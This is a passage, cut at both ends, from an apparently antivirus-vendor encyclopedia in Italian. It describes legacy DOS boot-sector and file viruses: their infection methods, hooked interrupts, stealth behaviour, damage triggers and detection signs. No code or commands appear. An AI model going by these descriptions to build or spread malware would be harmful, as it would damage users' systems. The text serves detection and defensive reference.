estensione *.COM. Vettore PC agganciato: INT 13h, INT 21h. Metodo di infezione: Quando viene eseguito un file infetto, il virus si carica in memoria. Mentre caricato, infetta i file con estensione *.COM aperti. Il virus sovrascrive i primi 512 Byte dei file infetti, ma archivia i dati originali nello spazio libero alla fine dei file. Danni: Se un file infetto viene copiato, alcuni dei suoi dati originali potrebbero essere distrutti. Note: Se si cerca di esaminare un file infetto, mentre il virus Φ in memoria, comparirα la versione non infetta originale. [Nop] Nome del Virus: Nop. Pseudonimo: Nops, Stealth_Boot. Descrizione: See Stealth_Boot.C. [Nov_17th] Nome del Virus: Nov_17th. Pseudonimo: November 17th. Tipo di Virus: Virus da file Lunghezza del Virus: 885 Byte. Descrizione: Questo virus infetta i file con estensione *.COM e *.EXE. Procedura eseguita: 1) Il virus controlla che sia in memoria. Se "No", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Una volta in memoria, infetta ogni file non infetto eseguito. Danni: Ogni giorno tra il 17 ed il 30 Novembre, il virus distrugge i primi 8 settori del disco utilizzato. Note: Si carica in memoria. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [One_half] Nome del Virus: One_half. Tipo di Virus: Virus da file. Lunghezza del Virus: 3.544 Byte. Descrizione: Infetta i file con estensione *.COM e *.EXE ed il file COMMAND.COM. Vettore PC agganciato: INT 21h. Metodo di infezione: Quando viene eseguito un file infetto, il virus si carica in memoria. Mentre caricato, infetta ogni file eseguibile aperto. Il programma DOS CHKDSK mostra la "total Byte memoria" diminuita di 4.096 Byte. I file con estensione *.COM e *.EXE infetti aumentano di 3.544 Byte. Danni: In fase di verifica. Note: Se si cerca di esaminare l'hard disk mentre il virus Φ in memoria, compare la versione non infetta originale. [Ontario] Nome del Virus: Ontario. Tipo di Virus: Virus da file. Lunghezza del Virus: 512 Byte. Descrizione: Infetta i file con estensione *.COM ed *.EXE, i file overlay *.OVL, il file COMMAND.COM. Quando si esegue un file infetto, il virus si installa in memoria. La memoria totale disponibile diminuisce di 2.048 Byte. Il virus infetta inoltre COMMAND.COM aumentando le sue dimensioni di 512 Byte. Una volta che il virus Φ in memoria, infetta i file che vengono eseguiti. I file infetti aumentano di 512 - 1.023 Byte di lunghezza a seconda del tipo di file. [Parity_boot.b] Nome del Virus: Parity_Boot.B. Pseudonimo: Parity_BOOT.B, Generic1. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo virus infetta il settore di boot. Vettore PC agganciato: INT 13h. Metodo di infezione: Quando il sistema Φ avviato da un dischetto non infetto, il virus infetta il Master Boot Record e si carica in memoria. Mentre caricato, infetta tutti i dischi non protetti eseguiti. Il programma DOSCHKDSK mostra la "total Byte memoria" diminuita di 1.024 Byte. Danni: Quando viene acceso il sistema, il virus ritarda di un'ora l'orologio. Ogni volta che un floppy Φ infettato, l'orologio viene reimpostato. Se nessun floppy viene infettato, il virus simula un errore di paritα, facendo comparire il seguente messaggio e bloccando il sistema: "Parity Check" Note: Se si cerca di esaminare il settore di boot mentre il virus Φ in memoria, compare la versione non infetta originale. [Readiosys] Nome del Virus: Readiosys. Pseudonimo: AntiCMOS, Lenart. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo virus infetta il settore di boot. Quando il sistema Φ avviato da un hard disk infetto, il virus si carica in memoria. Dopo che il caricamento Φ avvenuto con successo, il virus infetta i dischi eseguiti. Il programma DOS CHKDSK mostra la "total Byte memoria" diminuita di 2.048 Byte. Questo virus pu≥ cambiare i settaggi di CMOS, che dipendono dall'hardware. Molto spesso, il sistema si blocca prima che il virus abbia terminato di caricarsi in memoria. [Ripper] Nome del Virus: Ripper. Pseudonimo: Jack Ripper. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo virus infetta il settore di boot. Metodo di infezione: Il virus si carica in memoria quando il sistema viene avviato da un dischetto infetto. Mentre caricato, il virus infetta ogni disco non protetto eseguito. Danni: Il virus contamina l'hard disk gradualmente, scegliendo casualmente una scrittura sul disco (circa 1 ogni 1000) e scambia due parole nel buffer di scrittura. Note: Se si cerca di esaminare il settore di boot infetto mentre il virus Φ in memoria, compare la versione non infetta originale. [Slayer] Nome del Virus: Slayer. Pseudonimo: 5120, Vbasic. Tipo di Virus: Virus da file. Lunghezza del Virus: 5.120 Byte. Descrizione: Questo virus infetta i file con estensione *.COM e *.EXE. Quando viene eseguito un file infetto, il virus infetta tutti i file con estensione *.COM e *.EXE situati nella stessa directory. I file infetti passano da 5.120 Byte a 5.135 Byte con il virus localizzato alla fine del file. Le informazioni riguardanti data ed ora dei file infetti non sono cambiate. [Squisher] Nome del Virus: Squisher. Pseudonimo: Tiny Hunter. Tipo di Virus: Virus da file. Lunghezza del Virus: 340 Byte. Descrizione: Infetta i file con estensione *.COM ed il file COMMAND.COM. Quando si esegue un file infetto, il virus si installa nella memoria. La memoria disponibile del sistema rimane invariata. Quando il virus Φ in memoria, infetta i file con estensione *.COM che contengono pi∙ di 340 Byte di caratteri esadecimali '00' eseguiti. I file infetti non aumentano la loro lunghezza. Le informazioni riguardanti data ed ora dei file infetti non sono cambiate. [Stealth_Boot.C] Nome del Virus: Stealth_Boot.C. Pseudonimo: Amse, Nops, STELBOO, STB. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo virus infetta il settore di boot. Vettore PC agganciato: INT 13h. Metodo di infezione: Quando il sistema Φ avviato da un dischetto infetto, il virus si carica in memoria ed infetta il Master Boot Record. Mentre caricato, infetta ogni dischetto non protetto a cui si accede. Il programma DOS CHKDSK mostra la "Total Byte Memory" diminuita di 4.000 Byte. Danni: : Nessun danno intenzionale. Note: Se si cerca di esaminare i settori dell'hard disk infetti mentre il virus Φ in memoria, riporterα con un buffer pieno di zeri. [Stoned] Nome del Virus: Stoned. Pseudonimo: Marijuana, New Zealand, Stoned.Standard.A. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo virus infetta il settore di boot. Vettore PC agganciato: INT 13h. Metodo di infezione: Quando il sistema Φ avviato da un floppy infetto, il virus si carica in memoria ed infetta l'hard disk. Mentre caricato, infetta ogni dischetto aperto. Il programma DOS CHKDSK mostra la "total Byte memoria" diminuita di 2.048 Byte. Danni: Nessun danno intenzionale. Appare il seguente messaggio: "Your PC is now Stoned!" [Stoned.Azusa] Nome del Virus: Stoned.Azusa. Pseudonimo: Azusa, Hong Kong. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo virus infetta il settore di boot. Vettore PC agganciato: INT 13h. Metodo di infezione: Quando il sistema viene avviato da un dischetto infetto, il virus si carica in memoria. Mentre caricato, cerca di infettare ogni dischetto aperto. A differenza della maggior parte dei virus del settore di boot, non conserva una copia del Master Boot Record originale. Esso invece lo sovrascrive privandolo delle sue funzioni. Il programma DOS CHKDSK mostra la "total Byte memoria" diminuita di 1.024 Byte. Danni: Dopo un numero specifico di riavvii, il virus disabilita temporaneamente le porte parallele e seriali. [Sunday-1] Nome del Virus: Sunday-1. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.636 Byte. Descrizione: Infetta i file con estensione *.COM e *.EXE ed inoltre copre i file. Danni: Ogni domenica il virus pu≥ danneggiare il FAT. Compare inoltre il seguente messaggio: "Today is Sunday! Why do you work so hard? All work and no play makes you a dull boy! Come on! Let's go out and have some fun!" [Taiwan] Nome del Virus: Taiwan. Pseudonimo: Taiwan 2. Tipo di Virus: Virus da file. Lunghezza del Virus: 743 Byte. Descrizione: Infetta i file con estensione *.COM, incluso il file COMMAND.COM. Quando viene eseguito un file infetto, il virus prova ad infettare tre file con estensione *.COM partendo da C:\. I file infetti aumentano di 743 Byte di lunghezza con il virus situato all'inizio del file. Il virus viene attivato il giorno 8 di ogni mese quando riscrive il FAT table e la directory principale. [Telecom] Nome del Virus: Telecom. Pseudonimo: Telefonica. Tipo di Virus: Virus da file. Lunghezza del Virus: 3.700 Byte. Descrizione: Questo virus infetta i file con estensione *.COM. Quando si esegue un file infetto, il virus si installa nella memoria. La memoria totale disponibile diminuisce di 3.984 Byte. Una volta che il virus Φ in memoria, infetta i file con estensione *.COM pi∙ grandi di 1.000 Byte eseguiti. I file infetti aumentano di 3.700 Byte di lunghezza. Le informazioni riguardanti data ed ora dei file infetti sono modificate con l'aggiunta di 100 all'anno. [Tequila] Nome del Virus: Tequila. Pseudonimo: Stealth. Tipo di Virus: Virus da file. Lunghezza del Virus: 2.468 Byte. Descrizione: Infetta i file con estensione *.EXE, ed il settore di boot. Vettore PC agganciato: INT 13h, INT 21h. Metodo di infezione: La prima volta che Φ in esecuzione un file infetto, il virus infetta il Master Boot Record. Quando il sistema Φ avviato da un hard disk infetto, il virus si carica in memoria. Mentre caricato, infetta ogni file con estensione *.EXE eseguito. Il programma DOS CHKDSK presenta la "total Byte memoria" diminuita di 3.072 Byte. I file con estensione *.EXE aumentano di 2.468 Byte. Il virus non infetta file che iniziano con "V" o con "SC". Danni: Diversi mesi successivi alla prima infezione, il virus diventa attivo. In seguito, ogni mese, se un programma infetto Φ in esecuzione lo stesso giorno della prima infezione, compare sullo schermo un disegno e il seguente messaggio: Welcome to T.TEQUILA'S latest production. Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/Switzerland Loving thoughts to L.I.N.D.A BEER and TEQUILA forever ! Nota: Il virus si nasconde nel record della partizione infetta ed aumenta la lunghezza dei file infetti. [Traveller] Nome del Virus: Traveller. Pseudonimo: Bupt. Tipo di Virus: Virus da file. Lunghezza del Virus: Da 1.220 a 1.237 Byte. Descrizione: Infetta i file con estensione *.COM e *.EXE, ed il file COMMAND.COM. Quando si esegue un file infetto, il virus si installa nella memoria. La memoria disponibile totale diminuisce di 1.840 Byte. Quando il virus Φ in memoria, infetta i file con estensione *.COM e *.EXE alla loro esecuzione. Questo virus, inoltre, infetta quando viene utilizzato il comando DIR. I file infetti aumentano da 1.220 a 1.237 Byte, con il virus situato alla fine del file infetto. Le informazioni riguardanti data ed ora dei file infetti non sono cambiate. Nel virus si pu≥ trovare la stringa: "Traveller (C) BUPT 1991.4" "Don't panic I'm harmless <<---!!!!!!!" "*.* COMEXE" [Trivial] Nome del Virus: Trivial. Pseudonimo: Minimal, Mini-45. Tipo di Virus: Virus da file. Lunghezza del Virus: 45 Byte. Descrizione: Infetta i file con estensione *.COM ed il file COMMAND.COM. Quando viene eseguito un file infetto, il virus infetta tutti i file con estensione *.COM nella stessa directory: I primi 45 Byte dei file infetti vengono sovrascritti dal virus. Le informazioni riguardanti data ed ora dei file infetti vengono aggiornate all'ora dell'infezione. Tutti i file sono permanentemente danneggiati. [V-sign] Nome del Virus: V-sign. Pseudonimo: Cansu, Sigalet, Sigalit. Tipo di Virus: Virus da boot. Lunghezza del Virus: N/A. Descrizione: Questo virus infetta il settore di boot dei dischetti. Vettore PC agganciato: INT 13h. Metodo di infezione: Quando viene avviato un disco infetto, il virus si carica in memoria. Mentre caricato, infetta ogni disco a cui si accede. Il programma DOS CHKDSK mostra la "total Byte memoria" diminuita di 2 KB. Danni: Dopo aver infettato 64 dischi, il virus fa comparire sullo schermo una grande V e blocca il computer. [V2P6] Nome del Virus: V2P6. Tipo di Virus: Virus da file. Lunghezza del Virus: da 1.946 a 2.111 Byte. Descrizione: Questo virus infetta i file con estensione *.COM. Quando viene eseguito un file infetto, il virus infetta i primi file con estensione *.COM non infetti nella stessa directory. I file infetti aumentano di lunghezza passando da 1.946 a 2.111Byte con il virus situato alla fine del file. [Vacsina] Nome del Virus: Vacsina. Pseudonimo: Vacsina.TP-05.A, famiglia TP. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.206 Byte. Descrizione: Questo virus infetta i file con estensione *.COM e *.EXE. Metodo di infezione: Quando viene eseguito un file infetto, il virus si carica in memoria. Mentre si carica, infetta ogni file eseguito. Prima di infettare i file con estensione *.EXE, il virus li converte a file con estensione *.COM. Danni: Nessuno conosciuto. Nota: Esistono diverse varianti del virus Vacsina. La famiglia dei virus Vacsina Φ anche conosciuta come famiglia "T.P.". [VCL] Nome del Virus: VCL. Pseudonimo: Code Zero. Tipo di Virus: Virus da file. Lunghezza del Virus: 576 Byte. Descrizione: Infetta i file con estensione *.COM ed il file COMMAND.COM. Quando viene eseguito un file infetto, il virus cerca la stessa directory per un file con estensione *.COM non infetto. I file infetti aumentano di 576 Byte con il virus situato alla fine del file. Se nessun file non infetto viene trovato, compare sullo schermo il seguente messaggio: "** CODE ZERO **" Le informazioni riguardanti data ed ora dei file infetti non sono cambiate. Nel virus si pu≥ trovare la stringa: "*.* *.COM" "** CODE ZERO **" "Code Zero Virus" "1992 Nowhere Man/[NukE]" [Vengence] Nome del Virus: Vengence. Pseudonimo: Parasite, Vengeance. Tipo di Virus: Virus da file. Lunghezza del Virus: 723 Byte. Descrizione: Infetta i file con estensione *.COM ed il file COMMAND.COM. Quando viene eseguito un file infetto, il virus infetta il primo file con estensione *.COM non infetto nella stessa directory. I file infetti aumentano di 723 Byte con il virus situato alla fine del file. Le informazioni riguardanti data ed ora dei file infetti sono modificate presentando 56 nel campo dei secondi. Nel virus si pu≥ trovare la stringa: "*** Vengeance is ours! ***" "SKISM/Phalcon '92" "PATH=*.COM" "????????COM" [Vienna] Nome del Virus: Vienna. Pseudonimo: DOS-62, Unesco, Austrian, 648, PC Boot. Tipo di Virus: Virus da file. Lunghezza del Virus: 648 Byte. Descrizione: Questo virus infetta i file con estensione *.COM. Sintomi: I file infetti e quelli contenenti la stringa "*.COM" e "PATH=" aumentano di 648 Byte. I programmi distrutti causano il riavvio del computer mentre Φ in funzione. Danni: Con una probabilitα su sette il virus non infetta altri file. Esso scrive l'istruzione JMP F000:FFF0 (riavvio del computer) alla partenza di ogni programma. Il contenuto originale viene distrutto, la lunghezza del file non cambia e il programma distrutto contiene il segno del virus. [XPEH] Nome del Virus: XPEH. Pseudonimo: 4-B, Yankee Doodle.XPEH.4928, Micropox. Tipo di Virus: Virus da file. Lunghezza del Virus: 4.016 Byte. Descrizione: Questo virus infetta i file con estensione *.COM e *.EXE. Vettore PC agganciato: INT 1Ch, INT 21h. Metodo di infezione: Quando viene eseguito un file infetto, il virus si carica in memoria. Mentre caricato, infetta ogni file eseguibile. Il programma DOS CHKDSK mostra la "total Byte memoria" diminuita di 4.032 Byte. I file infetti aumentano di 4.016 Byte. Danni: In fase di verifica. [Yank-D.TP.44.A] Nome del Virus: Yank-D.TP.44.A. Pseudonimo: Yankee Doodle, TP44. Tipo di Virus: Virus da file. Lunghezza del Virus: 2.899 Byte. Descrizione: Questo virus infetta i file con estensione *.COM e *.EXE. Quando si esegue un file infetto, il virus si installa nella memoria. Una volta che il virus Φ in memoria, ogni giorno alle 17 fa sentire dagli altoparlanti la canzone "Yankee Doodle" . I file infetti aumentano di 2.899 Byte. [Simple] Nome del Virus: Simple cd. Tipo di Virus: Virus da file (infetta solo i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: Cerca i file con estensione *.COM nella directory corrente. Quando trova un file con estensione *.COM, controlla che sia stato precedentemente infettato dal virus SIMPLE. Se "SI", continua la ricerca dei file con estensione *.COM. Quindi infetta i file e cerca ogni altro file con estensione *.COM, finchΘ tutti i file con estensione *.COM della directory vengono infettati. Danni: Sovrascrive il file originale. In tal modo la lunghezza del file originale non presenta nessuna variazione. Note: Non rimane in memoria. SIMPLE non intercetta l'INT 24h quando i nfetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come protetto da scrittura). [Alien-1] Nome del Virus: Alien-1. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 571 Byte (COM ed EXE). Vettore PC agganciato: INT 21h. Procedura eseguita: Controlla che sia stato caricato nella memoria alta. Se "No", si carica in memoria (memoria alta) i ntercettando l'INT 21. In seguito esegue l'originale file richiamato. Se "SI", esegue direttamente il file originale richiamato. Danni: Nessuno. Caratteristiche: 1) Quando viene eseguito un file non infetto, il file viene infettato. Il virus infetta i file intercettando l'INT 21h(AX=4B). 2) Alien-1 non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 571 Byte. [Lep-0736] Nome del Virus: Lep-0736. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.COM ed *.EXE nella directory corrente. 2) Controlla che i file trovati siano stati infettati da LEP-0736. Se "SI", continua a cercare file non infetti con estensione *.COM ed *.EXE. 3) Infetta i file non infetti (infetta solo quattro file alla volta). Quindi compare sullo schermo il seguente messaggio: "Program too big to fit in memoria" Danni: Sovrascrive il file originale. In tal modo la lunghezza del file non aumenta. Metodo di rilevazione: Ricerca del messaggio d'errore: "Program too big to fit in memoria." Note: 1) Non rimane in memoria. 2) LEP-0736 non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Ice-199] Nome del Virus: Ice-199. Tipo di Virus: Virus da file (infetta solo i file con estensione *.COM). Lunghezza del Virus: 199 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla che sia giα infettato da Ice-199. Se "SI", continua a cercare file con estensione *.COM non infetti. 3) Infetta un solo file alla volta. Danni: Nessuno. Metodo di rilevazione: I file infetti incrementano la loro lunghezza di 199 Byte. Note: 1) Non rimane in memoria. 2) ICE-199 non intercetta l'INT 24h quando infetta il file. Compare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Made-255] Nome del Virus: Made-255. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 255 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla che sia giα infettato da Made-255. Se "SI", continua a cercare file con estensione *.COM non infetti. 3) Infetta un solo file alla volta. Danni: Nessuno Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 255 Byte. Note: 1) Dopo che Φ stato eseguito un file infetto, il sistema diventa instabile. 2) Non rimane in memoria. 3) MADE-255 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [2570] Nome del Virus: 2570. Tipo di Virus: Virus da file (infetta solo i file con estensione *.COM). Lunghezza del Virus: 2.570 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: Ricerca un file con estensione *.COM nella cartella in uso. Dapprima verifica che vi siano dei file precedentemente infettati da "2570". Se "SI", continua a cercare un file con estensione *.COM. Infetta un solo file con estensione *.COM alla volta. Dopo che avvenuta l'infezione, sullo schermo appare la seguente lista di informazioni: a) Cycle sluts from hell.. b) Virus Mania IV.. c) 2 Live Crew is fucking cool.. d) Like Commentator I, HIP-HOP sucks.. e) dr. Ruth is a first-class lady!.. f) Don t be a wimp, Be dead!.. and so on. Then the originally called program will be executed. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 2.570 Byte. Note: Non rimane in memoria. 2570 non aggancia l'INT 24h quando infetta i file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Ice-250] Nome del Virus: Ice-250. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 250 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla che sia giα infettato da Ice-250. Se "SI", continua a cercare un file con estensione *.COM non infetto. 3) Infetta solo un file alla volta. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue d imensioni di 250 Byte. Note: 1) Non rimane in memoria. 2) ICE-250 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Ice-224] Nome del Virus: Ice-224. Tipo di Virus: Virus Infector (infetta i file con estensione *.COM). Lunghezza del Virus: 224 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla che sia giα infettato da Ice-224. Se "SI", continua a cercare un file con estensione *.COM non infetto. 3) Infetta un solo file alla volta. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue d imensioni di 224 Byte. Note: 1) Non rimane in memoria. 2) ICE-224 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Lct-762] Nome del Virus: Lct-762. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 762 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla che sia giα infettato da LCT-762. Se "SI", continua a cercare un file con estensione *.COM non infetto. 3) Infetta tutti i file con estensione *.COM finchΘ tutti i file della stessa directory non sono stati infettati. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 762 Byte. Note: 1) Non rimane in memoria. 2) LCT-762 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Alien-3] Nome del Virus: Alien-3. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 625 Byte (COM ed EXE). Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia stato caricato nella memoria alta. Se "NO", si carica in memoria (nella porzione principale della memoria) intercettando l'INT 21h. 2) Il virus controlla l'ora di sistema; se il numero di minuti trascorsi Φ compreso tra 33 e 60, fa comparire sullo schermo delle virgolette " ". 3) Dopo l'infezione esegue il file originale. Danni: Nessuno. Caratteristiche: 1) Il virus infetta i file intercettando l'INT 21h (AX=4B). Quando un file non infetto viene eseguito, il file Φ infettato. 2) Alien-3 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 625 Byte. [Lep-562] Nome del Virus: Lep-562. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.COM o *.EXE nella cartella in uso. 2) Controlla che sia stato infettato da LEP-562. Se "SI", continua a cercare file con estensione *.COM ed *.EXE non infetti. 3) Se "No", infetta i file non infetti (infettando solo quattro file alla volta). Quando viene eseguito il file, il seguente messaggio appare sullo schermo: "Program too big to fit in memoria." Danni: Sovrascrive il file originale, cos∞ la lunghezza del file non aumenta. Metodo di rilevazione: Cercare il messaggio: "Program too big to fit in memory" sullo schermo. Note: 1) Non rimane in memoria. 2) LEP-562 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Navi-282] Nome del Virus: Navi-282. Tipo di Virus: Virus da file (infetta solo i file con estensione *.COM). Lunghezza del Virus: 282 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla che sia stato infettato da NAVI-282. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta un solo file alla volta. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 282 Byte. Note: 1) Non rimane in memoria. 2) NAVI-282 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Minimite] Nome del Virus: Minimite. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 183 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla che sia giα infettato da Minimite. Se "SI", continua a cercare i file con estensione *.COM non infetti. 3) Continua ad infettare file finchΘ tutti i file con estensione *.COM nella corrente directory non sono stati infettati. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 183 Byte. Note: 1) Non rimane in memoria. 2) Minimite non intercetta l'INT 24h quando infetta il file. Un messaggio d'errore appare in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Spanz] Nome del Virus: Spanz. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 639 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla la data dei file con estensione *.COM . 3) Controlla che sia giα infettato da Spanz. Se "SI", continua a cercare i file con estensione *.COM non infetti. 4) Infetta un solo file alla volta. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 639 Byte. Note: 1) Non rimane in memoria. 2) Spanz non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Wilbur] Nome del Virus: Wilbur. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 512 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla che sia stato infettato da Wilbur. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta solo un file alla volta. 4) Dopo che Φ avvenuta l'infezione, esegue il file originale. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 512 Byte. Note: 1) Non rimane in memoria. 2) Wilbur non intercetta l'INT 24h quando infetta il file. Un messaggio d'errore appare in caso ci sia un errore di I/O (Come protetto da scrittura). [Repent] Nome del Virus: Repent. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Controlla quindi che sia giα stato infettato da Repent. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta solo tre file alla volta. Danni: Sovrascrive il file, cos∞ la lunghezza del file non aumenta. Note: 1) Non rimane in memoria. 2) Repent non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Twin-Peak] Nome del Virus: Twin-Peak. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da TWIN-PEAK. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta un solo file alla volta. Danni: Sovrascrive il file originale, cos∞ la lunghezza del file infetto non aumenta. Note: 1) Non rimane in memoria. 2) TWIN-PEAK non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Pa-5792] Nome del Virus: Pa-5792. Tipo di Virus: Virus da file (infetta i file con estensione *.EXE). Lunghezza del Virus: 5792 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca un file con estensione *.EXE nella directory corrente ed il drive "A". 2) Controlla quindi che sia giα stato infettato da PA-5792. Se "SI", continua a cercare ogni file con estensione *.EXE non infetto. 3) Infetta solo sette file alla volta. 4) Esegue il file originale richiamato. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 5.792 Byte. Note: 1) Non rimane in memoria. 2) PA-5792 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Les] Nome del Virus: Les. Tipo di Virus: Virus da file (infetta i file con estensione *.EXE). Lunghezza del Virus: 358 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.EXE nella directory corrente. 2) Controlla che sia stato infettato dal virus LES. Se "SI", continua a cercare ogni file con estensione *.EXE non infetto. 3) Infine infetta tutti i file con estensione *.EXE nella directory. Danni: Nessuno. Metodo di rilevazione: Il file infetto incrementa le sue dimensioni di 358 Byte. Note: 1) Non rimane in memoria. 2) LES non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [H & P] Nome del Virus: H&P. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.COM nella directory corrente. 2) Controlla che sia giα stato infettato da H&P. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infetta solo un file alla volta. Danni: Sovrascrive il file originale, cos∞ la lunghezza del file infetto non aumenta. Note: 1) Non rimane in memoria. 2) H&P non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [OW] Nome del Virus: Ow. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.COM nella directory corrente. 2) Cerca di vedere se Φ giα stato infettato da OW. Se "SI", continua a cercare ogni file con estensione *.COM non infetto. 3) Infine infetta tutti i file della directory. Danni: Sovrascrive il file originale, cos∞ la lunghezza del file infetto non aumenta. Note: 1) Non rimane in memoria. 2) OW non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Small115] Nome del Virus: Small115. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 115 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con 